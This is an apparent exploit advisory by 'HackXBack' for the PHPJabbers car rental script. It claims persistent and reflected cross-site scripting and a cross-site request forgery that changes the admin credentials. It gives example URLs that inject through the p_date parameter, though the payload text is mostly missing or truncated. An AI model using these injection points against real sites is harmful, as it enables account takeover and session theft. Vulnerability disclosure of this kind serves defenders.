Car Rental Script - Multiple Vulnerabilities ==================================================================== #################################################################### .:. Author : HackXBack .:. Contact : h-b@usa.com .:. Home : http://www.iphobos.com/blog/ .:. Script : http://www.phpjabbers.com/car-rental/ #################################################################### ===[ Exploit ]=== [1] Multiple Cross Site Scripting ================================= I. Persistent XSS # CSRF with XSS Exploit:
II. Non-Persistent XSS www.site.com/index.php?controller=AdminBookings&action=index&p_date=XSS www.site.com/index.php?controller=AdminBookings&action=index&p_date= ">"/> [2] Cross Site Request Forgery =============================== [Change Username/Password Admin]
####################################################################